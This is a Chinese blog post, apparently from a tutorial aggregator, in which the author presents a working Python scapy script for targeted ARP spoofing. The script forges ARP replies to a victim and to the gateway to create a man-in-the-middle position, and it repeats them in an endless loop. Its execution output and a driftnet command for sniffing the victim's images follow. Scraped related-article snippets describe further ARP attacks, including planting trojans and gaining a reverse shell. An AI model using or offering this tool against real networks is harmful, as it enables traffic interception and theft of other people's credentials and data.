刚学习了scapy模块的一些用法,非常强大,为了练手,利用此模块编写了一个arp欺骗工具,其核心是构造arp欺骗包。加了一个-a参数用于进行全网欺骗,先暂不实现。代码如下:

 #--*--coding=utf-8--*--

 from scapy.all import *

 import optparse

 import threading

 #解决在linux系统上运行时报的unicode编码相关错误

 import sys

 reload(sys)

 sys.setdefaultencoding('utf-8')

 def getMac(tgtIP):

     '''

     调用scapy的getmacbyip函数,获取攻击目标IP的MAC地址。

     '''

     try:

         tgtMac = getmacbyip(tgtIP)

         return tgtMac

     except:

         print '[-]请检查目标IP是否存活' 

 def createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP):

     '''

     生成ARP数据包,伪造网关欺骗目标计算机

     srcMac:本机的MAC地址,充当中间人

     tgtMac:目标计算机的MAC

     gatewayIP:网关的IP,将发往网关的数据指向本机(中间人),形成ARP攻击

     tgtIP:目标计算机的IP

     op=2,表示ARP响应

     '''

     pkt = Ether(src=srcMac,dst=tgtMac)/ARP(hwsrc=srcMac,psrc=gatewayIP,hwdst=tgtMac,pdst=tgtIP,op=2)

     return pkt

 def createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP):

     '''

     生成ARP数据包,伪造目标计算机欺骗网关

     srcMac:本机的MAC地址,充当中间人

     gatewayMac:网关的MAC

     tgtIP:目标计算机的IP,将网关发往目标计算机的数据指向本机(中间人),形成ARP攻击

     gatewayIP:网关的IP

     op=2,表示ARP响应

     '''

     pkt = Ether(src=srcMac,dst=gatewayMac)/ARP(hwsrc=srcMac,psrc=tgtIP,hwdst=gatewayMac,pdst=gatewayIP,op=2)

     return pkt

 def main():

     usage = 'Usage: %prog -t <targetip> -g <gatewayip> -i <interface> -a'

     parser = optparse.OptionParser(usage,version='v1.0')

     parser.add_option('-t',dest='targetIP',type='string',help='指定目标计算机IP')

     parser.add_option('-g',dest='gatewayIP',type='string',help='指定网关IP')

     parser.add_option('-i',dest='interface',type='string',help='指定使用的网卡')

     parser.add_option('-a',dest='allarp',action='store_true',help='是否进行全网arp欺骗')

     options,args = parser.parse_args()

     tgtIP = options.targetIP

     gatewayIP = options.gatewayIP

     interface = options.interface

     if tgtIP == None or gatewayIP == None or interface == None:

         print parser.print_help()

         exit(0)

     srcMac = get_if_hwaddr(interface)

     print '本机MAC地址是:',srcMac

     tgtMac = getMac(tgtIP)

     print '目标计算机MAC地址是:',tgtMac

     gatewayMac = getMac(gatewayIP)

     print '网关MAC地址是:',gatewayMac

     raw_input('按任意键继续:')

     pktstation = createArp2Station(srcMac,tgtMac,gatewayIP,tgtIP)

     pktgateway = createArp2Gateway(srcMac,gatewayMac,tgtIP,gatewayIP)

     i = 1

     while True:

         t = threading.Thread(target=sendp,args=(pktstation,),kwargs={'iface':interface})

         t.start()

         t.join()

         print str(i) + ' [*]发送一个计算机ARP欺骗包'

         s = threading.Thread(target=sendp,args=(pktgateway,),kwargs={'iface':interface,})

         s.start()

         s.join()

         print str(i) + ' [*]发送一个网关ARP欺骗包'

         i += 1       

 if __name__ == '__main__':

     main()

验证如下:

 # python arpspoof.py -t 192.168.1.28 -g 192.168.1.1 -i wlan0

 WARNING: No route found for IPv6 destination :: (no default route?)

 本机MAC地址是: xxx

 目标计算机MAC地址是:xxx

 网关MAC地址是: xxx

 按任意键继续:

 .

 Sent 1 packets.

 1 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 1 [*]发送一个网关ARP欺骗包

 .

 Sent 1 packets.

 2 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 2 [*]发送一个网关ARP欺骗包

 .

 Sent 1 packets.

 3 [*]发送一个计算机ARP欺骗包

 .

 Sent 1 packets.

 3 [*]发送一个网关ARP欺骗包

 ......

#driftnet -i wlan0

用python编写的定向arp欺骗工具的更多相关文章

  1. Python编写类似nmap的扫描工具

    文主要是利用scapy包编写了一个简易扫描工具,支持ARP.ICMP.TCP.UDP发现扫描,支持TCP SYN.UDP端口扫描,如下: usage: python scan.py <-p pi ...

  2. Python编写的Linux邮件发送工具

    之前有用过Linux自带的mail工具来定时发送邮件,但是要装mailx还有配mail.rc,这还比较正常,关键是到了ubantu下这工具用起来真是操蛋,如果哪天其他的unix like操作系统也有需 ...

  3. 用python编写的excel拆分小工具

    from datetime import date,datetime from openpyxl import Workbook from openpyxl import load_workbook ...

  4. Python黑帽编程 3.1 ARP欺骗

    Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...

  5. Python黑客编程ARP欺骗

    Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...

  6. 使用ARP欺骗, 截取局域网中任意一台机器的网页请求,破解用户名密码等信息

    ARP欺骗的作用 当你在网吧玩,发现有人玩LOL大吵大闹, 用ARP欺骗把他踢下线吧 当你在咖啡厅看上某一个看书的妹纸,又不好意思开口要微信号, 用arp欺骗,不知不觉获取到她的微信号和聊天记录,吓一 ...

  7. Arp欺骗攻击的另类应用之屌丝泡妞记

    http://www.2cto.com/Article/201210/163974.html   arp欺骗,我想大家都应该知道怎么回事了.不知道的去问度娘...   就不废话了,还是直接上图上教程比 ...

  8. Mac和Linux系统的:Arp欺骗源码

    linux系统, 简化版的ARP欺骗工具 精简版, 没有很多代码, 只要把准备好的数据, 发送给到网卡接口, 利用这个工具, 可以让局域网内的一台计算机暂时掉线: #include <stdio ...

  9. kali系统:局域网arp欺骗, 搞定任意windows计算机

    目的 通过Arp欺骗, 给局域网内的所有用户网页中植入木马, 只要用户运行以后, 就会反弹一个shell到我们计算机 准备 kali系统 metaspolit的使用 Arp欺骗工具:bettercap ...

随机推荐

  1. hlg 1580 tell me the length

    智力题,观察上一行,有几个数字. 比如,S[1]=1; S[2]=11; S[3]=21; S[4]=1211; 这样就可以观察出来,序列一是1个1 --->  S[2] = 11 ; 序列二是 ...

  2. 如果您无法使用Docker的存储库来安装Docker CE

    如果您无法使用Docker的存储库来安装Docker CE,则可以下载.deb适用于您的发行版的 文件并手动安装.每次要升级Docker CE时都需要下载新文件. 转到https://download ...

  3. Java 学习(3):java 对象和类

    目录: --- 对象 --- 类 --- 源文件的声明规则 --- Java 包 对象: 对象是类的一个实例(对象不是找个女朋友),有状态和行为.例如,一条狗是一个对象,它的状态有:颜色.名字.品种: ...

  4. 软件包管理器(bzoj 4196)

    Description Linux用户和OSX用户一定对软件包管理器不会陌生.通过软件包管理器,你可以通过一行命令安装某一个软件包,然后软件包管理器会帮助你从软件源下载软件包,同时自动解决所有的依赖( ...

  5. Codeforces Round #267 (Div. 2) C. George and Job (dp)

    wa哭了,,t哭了,,还是看了题解... 8170436                 2014-10-11 06:41:51     njczy2010     C - George and Jo ...

  6. msp430入门学习42

    msp430的其他十 msp430入门学习

  7. AC日记——租用游艇 洛谷 P1359

    题目描述 长江游艇俱乐部在长江上设置了n 个游艇出租站1,2,…,n.游客可在这些游艇出租站租用游艇,并在下游的任何一个游艇出租站归还游艇.游艇出租站i 到游艇出租站j 之间的租金为r(i,j),1& ...

  8. http状态码的分类

    状态码分类 转自http://www.cnblogs.com/TankXiao/archive/2013/01/08/2818542.html HTTP状态码被分为五大类, 目前我们使用的HTTP协议 ...

  9. codeforces #472(div 1)

    B(two point) 题意: 给出长度为n的非递减数组E[1..n],对于所有三元组(i,j,k),1<=i<j<k<=n且Ek-Ei<=U,我们需要计算出最大的(E ...

  10. Object源码

    1.Object是所有类的父类,默认会继承Object. 2.Object类中常用的方法有:getClass().hashCode().equals().clone().toString().fina ...